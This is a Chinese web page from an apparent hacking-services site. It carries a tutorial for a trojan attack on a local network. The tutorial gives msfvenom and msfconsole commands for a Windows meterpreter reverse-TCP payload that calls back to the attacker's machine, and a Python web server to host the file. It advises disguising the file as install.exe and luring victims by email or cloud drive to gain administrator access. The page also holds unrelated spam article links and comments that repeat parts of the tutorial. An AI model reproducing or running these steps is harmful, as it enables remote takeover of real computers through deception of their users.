当前位置:首页 > 黑客服务 > 正文内容

基于局域网渗透攻击之木马攻击

访客4年前 (2021-04-15)黑客服务437

使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。

准备环境

攻击机(kali):192.168.29.130

被攻击机(window server 2008 SP2):192.168.29.135

1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe2.kali攻击机打开msfconsoleuse exploit/multi/handler? //使用攻击模块set payload windows/meterpreter/reverse_tcp? //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130 //设置源IP(攻击机IP)set LPORT 4444? //设置源端口(攻击机未被占用端口)show options ? //查看配置选项(选填,可查看未配置选项)3.实施攻击操作4.kali攻击机将木马文件拷贝到指定目录5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 806.查看被攻击者的IP地址详情

7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是最高administrator权限原文链接

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/105913.html

分享给朋友:

“基于局域网渗透攻击之木马攻击” 的相关文章

洗米华被抓(沙美华最近怎么了)

据中国电子商务研究中心2021年11月26日23:49:12的最新发布,微博网友@魔鬼管理学 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,洗米华被抓后来我换了俱乐部。。。 1.洗米华出什么事了...

约茶app约茶APP

最新约茶app都是哪些?整理了30本这篇文章主要介绍了约茶app,包括约茶app ios下载,下面小编整理了约茶app的图文教程,看看约茶app苹果版详细步骤吧! 觉得网上的一些答 据新快网2021年10月20日03:31:27的新闻报道,微博网友@R卜傲晴 爆料。 平安夜来临之际,事件,在网上...

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另 鸡鸭的肛门附近组织,布满大大小小的腺体,各类秽物与毒素都在这些腺体囤积;鸡鸭的肛门也有非常高密度的大肠杆菌,所以鸡鸭的屁股不是少吃的问题,而是不能吃.吃得少可能没觉出怎样,多了问题就显出来了.而且鸡鸭屁股的大肠杆菌会随着蛋生出来的时...

身份证信息被黑客盗取(黑客能把手机内身份证信息盗取吗)

一、身份证信息被黑客盗取(黑客能把手机内身份证信息盗取吗)方法总结 1、黑客通过手身份姓名能否窃取别人银行卡里。朋友你好,这个问题不是这样理解的的,黑客是通过你的这些信息,破易你的银行卡号支付密码来盗取你的财物的,一般你只要不乱点链接,不轻易在手机。黑客控制了手机,窃取了身份证号码手机号姓名等所有...

古文化常识(中国古代文化常识大全)

1.中国古代文化常识 文学常识? 四本书:《论语》、《中庸》、《孟子大学》 五经:《诗经》《礼记》《周易》《春秋》 乐府双壁:木兰诗孔雀东南飞 三个字:警告世界,说真话,说真话,唤醒世界,说同样的话 第二枪:第一枪很厉害,第二枪也很厉害 三官:石渠官、潼关官、新安官 三次告别:新婚、老...

鸡业行情网今日鸡价,鸡业行情网下载安装

河南:新乡肉鸡价格4点45:鸡架2点鸡肉7点鸡大腿鸡翅根8点鸡爪鸡翅尖鸡翅中鸡心鸡肝,其地址为http,除江苏地区苗鸡价格略涨,烟台网肉鸡价格4点65-4点75元/斤/wyimucom/down-15679html,1点00元/羽,点击“下载文件。以市斤为单位/羽 菏泽鸡苗价格3点90-4点30元/...

评论列表

可难末屿
3年前 (2022-07-05)

攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是最高administrator权限原文链接

只影怯慌
3年前 (2022-07-05)

ython -m SimpleHTTPServer 806.查看被攻击者的IP地址详情7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或

双笙颇倔
3年前 (2022-07-05)

ndow server 2008 SP2):192.168.29.1351、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp L

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。